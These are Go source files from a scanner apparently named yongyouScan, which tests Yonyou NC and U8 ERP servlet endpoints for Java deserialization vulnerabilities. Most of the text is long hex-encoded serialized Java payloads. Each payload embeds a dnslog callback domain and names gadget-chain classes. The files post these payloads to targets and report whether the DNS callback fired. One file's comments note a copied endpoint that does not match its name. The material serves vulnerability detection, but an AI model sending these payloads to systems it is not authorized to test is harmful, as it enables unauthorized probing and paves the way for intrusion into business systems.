FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 27 | if err != nil { 28 | color.Red.Println("[-] 用友 files 反序列化漏洞不存在") 29 | return 30 | } 31 | if dnslog.GetDnslogRecord(session) { 32 | color.Green.Println("[+] 用友 files 反序列化漏洞存在 -> " + url) 33 | return 34 | } 35 | 
color.Red.Println("[-] 用友 files 反序列化漏洞不存在") 36 | } 37 | -------------------------------------------------------------------------------- /pkg/POC/NC-Cloud-MxServlet/NC-Cloud-MxServlet.go: -------------------------------------------------------------------------------- 1 | package u8_MxServlet 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | func Run(url string) { 19 | domain, session := dnslog.GetDnslogUrl() 20 | url = url + "/servlet/~ic/nc.bs.framework.mx.MxServlet" 21 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 22 | "User-Agent": UA, 23 | "Content-Length": "20434", 24 | "Content-Type": "application/x-www-form-urlencoded", 25 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 U8 MxServlet反序列化漏洞不存在") 28 | return 29 | } 30 | if dnslog.GetDnslogRecord(session) { 31 | color.Green.Println("[+] 用友 U8 MxServlet反序列化漏洞存在 -> " + url) 32 | return 33 | 
} 34 | color.Red.Println("[-] 用友 U8 MxServlet反序列化漏洞不存在") 35 | } 36 | -------------------------------------------------------------------------------- /pkg/POC/U8-RegisterServlet/U8-RegisterServlet.go: -------------------------------------------------------------------------------- 1 | package U8_RegisterServlet 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | func Run(url string) { 19 | domain, session := dnslog.GetDnslogUrl() 20 | url = url + "/servlet/RegisterServlet" 21 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 22 | "User-Agent": UA, 23 | "Content-Length": "100", 24 | "Content-Type": "application/x-www-form-urlencoded", 25 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E0026740004687474
7070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F767931
3730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C77080000001000
0000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 U8 RegisterServlet反序列化漏洞不存在") 28 | return 29 | } 30 | if dnslog.GetDnslogRecord(session) { 31 | color.Green.Println("[+] 用友 U8 RegisterServlet反序列化漏洞存在 -> " + url) 32 | return 33 | } 34 | color.Red.Println("[-] 用友 U8 RegisterServlet反序列化漏洞不存在") 35 | } 36 | -------------------------------------------------------------------------------- /pkg/POC/u8-LoginServlet/u8-LoginServlet.go: -------------------------------------------------------------------------------- 1 | package u8_LoginServlet 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | func Run(url string) { 19 | domain, session := dnslog.GetDnslogUrl() 20 | url = url + "/servlet/~uap/nc.bs.sm.login.LoginServlet" 21 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 22 | "User-Agent": UA, 23 | "Content-Length": "43396", 24 | "Content-Type": "application/x-www-form-urlencoded", 25 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 U8 LoginServlet反序列化漏洞不存在") 28 | return 29 | } 30 | if dnslog.GetDnslogRecord(session) { 31 | color.Green.Println("[+] 用友 U8 LoginServlet反序列化漏洞存在 -> " + url) 32 | 
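return
}
color.Red.Println("[-] 用友 U8 LoginServlet反序列化漏洞不存在")
}
--------------------------------------------------------------------------------
/pkg/POC/NC-XbrlPersistenceServlet/yonyou-NC-XbrlPersistenceServlet.go:
--------------------------------------------------------------------------------
// Package ERP_NC_MLBL holds the NC XbrlPersistenceServlet check.
//
// NOTE(review): the package clause still carries the name of the ERP-NC-MLBL
// file this one was copied from. Renaming it would change how main.go refers
// to the package, so it is left unchanged here.
package ERP_NC_MLBL

import (
	"encoding/hex"
	"fmt"
	"strings"
	"time"

	"github.com/gookit/color"
	"github.com/imroc/req/v3"

	"yongyouScan/pkg/dnslog"
	"yongyouScan/pkg/utils"
)

var (
	// client is shared by every call to Run. The 5 s timeout matches the
	// sibling checks in this package tree; the original file had none, so a
	// host that accepts the connection and never answers stalled the scan.
	// EnableDumpEachRequest is kept from the original; nothing in this file
	// reads the dump.
	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
	// UA is the User-Agent sent with every request.
	UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
)

// Run posts the DNS-callback probe to the endpoint below url and prints the
// result on stdout.
//
// url is the target base URL; a trailing slash is trimmed before the endpoint
// path is appended. There is no return value: a hit on the dnslog session
// prints a green "[+]" line, no hit prints a red "[-]" line, and a transport
// error prints a yellow "[!]" line so that an unreachable or timed-out host is
// not reported as "not vulnerable".
func Run(url string) {
	domain, session := dnslog.GetDnslogUrl()
	// NOTE(review): this is the same endpoint and Content-Length as the
	// U8-OA-getSessionList check, not an XbrlPersistenceServlet path — looks
	// like a copy-paste leftover; confirm the intended endpoint before relying
	// on this check's result.
	url = strings.TrimSuffix(url, "/") + "/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
	// The body is the hex template below with the dnslog domain spliced in via
	// fmt.Sprintf, run through utils.InsertBackslashX and wrapped in a
	// {{unquote("...")}} expression. The template is kept verbatim.
	body := fmt.Sprintf("{{unquote(\"%s\")}}",
		utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500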